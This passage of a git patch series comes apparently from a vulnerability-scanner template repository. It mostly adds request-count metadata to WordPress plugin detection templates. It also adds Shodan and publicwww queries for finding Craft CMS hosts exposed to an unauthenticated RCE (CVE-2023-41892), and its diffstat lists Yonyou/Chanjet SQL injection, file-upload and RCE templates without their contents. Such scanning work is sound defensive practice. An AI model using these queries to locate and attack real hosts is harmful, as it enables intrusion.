     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 1353a5c20462119fbe668649a20efad139c0eaaa Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Fri, 15 Sep 2023 15:54:32 +0530
Subject: [PATCH 0373/1090] added metadata

---
 http/cves/2023/CVE-2023-41892.yaml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml
index ee2f6780f5..bab13aee17 100644
--- a/http/cves/2023/CVE-2023-41892.yaml
+++ b/http/cves/2023/CVE-2023-41892.yaml
@@ -18,6 +18,11 @@ info:
     cwe-id: CWE-94
     epss-score: 0.00044
     epss-percentile: 0.08209
+  metadata:
+    max-request: 1
+    verified: true
+    publicwww-query: "craftcms"
+    shodan-query: http.favicon.hash:-47932290
   tags: cve,cve2023,rce,unauth,craftcms
 
 http:

From c84e4ef64c6dab52f601d1e0cccb553a8a80beae Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 15 Sep 2023 17:53:57 +0530
Subject: [PATCH 0374/1090] Templates - update

---
 .../2021/CNVD-2021-30167.yaml.yaml}           |  0
 .../2023/CNVD-C-2023-76801.yaml}              |  0
 http/cves/2022/CVE-2022-0342.yaml             | 33 +++++++++
 .../wechat/wechat-info-leak.yaml              | 14 ++--
 ...n-sqli.yaml => chanjet-gnremote-sqli.yaml} | 29 ++++----
 .../yonyou/chanjet-tplus-checkmutex-sqli.yaml | 19 ++++--
 .../yonyou/chanjet-tplus-file-read.yaml       | 33 +++++++++
 .../yonyou/chanjet-tplus-fileupload.yaml      | 43 ++++++++++++
 ...et-tplus-getstorewarehousebystore_rce.yaml | 67 -------------------
 .../yonyou/chanjet-tplus-rce.yaml             | 53 +++++++++++++++
 ...qli.yaml => chanjet-tplus-ufida-sqli.yaml} | 20 +++---
 ... => grp-u8-uploadfiledata-fileupload.yaml} | 26 ++++---
 .../yonyou-chanjet-tplus-file-upload.yaml     | 40 -----------
 ...chanjie-tplus-downloadproxy-file-read.yaml | 29 --------
 .../yonyou/yonyou-fe-directory-traversal.yaml | 30 ++++-----
 ....yaml => yonyou-nc-accept-fileupload.yaml} | 24 +++----
 ...=> yonyou-nc-baseapp-deserialization.yaml} | 24 ++++---
 ...l => yonyou-nc-dispatcher-fileupload.yaml} | 19 +++---
 ...ereceiveservlet-arbitrary-file-upload.yaml | 33 ---------
 ...you-nc-filereceiveservlet-fileupload..yaml | 41 ++++++++++++
 ...=> yonyou-nc-grouptemplet-fileupload.yaml} | 16 +++--
 .../yonyou-nc-ncmessageservlet-rce.yaml       | 26 +++----
 .../yonyou-u8-crm-getemaildata-file-read.yaml | 23 -------
 .../yonyou/yonyou-u8-crm-lfi.yaml             | 29 ++++++++
 http/vulnerabilities/zyxel/CVE-2022-0342.yaml | 41 ------------
 25 files changed, 367 insertions(+), 345 deletions(-)
 rename http/{vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml => cnvd/2021/CNVD-2021-30167.yaml.yaml} (100%)
 rename http/{vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml => cnvd/2023/CNVD-C-2023-76801.yaml} (100%)
 create mode 100644 http/cves/2022/CVE-2022-0342.yaml
 rename http/vulnerabilities/yonyou/{yonyou-chanjet-remote-gnfunction-sqli.yaml => chanjet-gnremote-sqli.yaml} (50%)
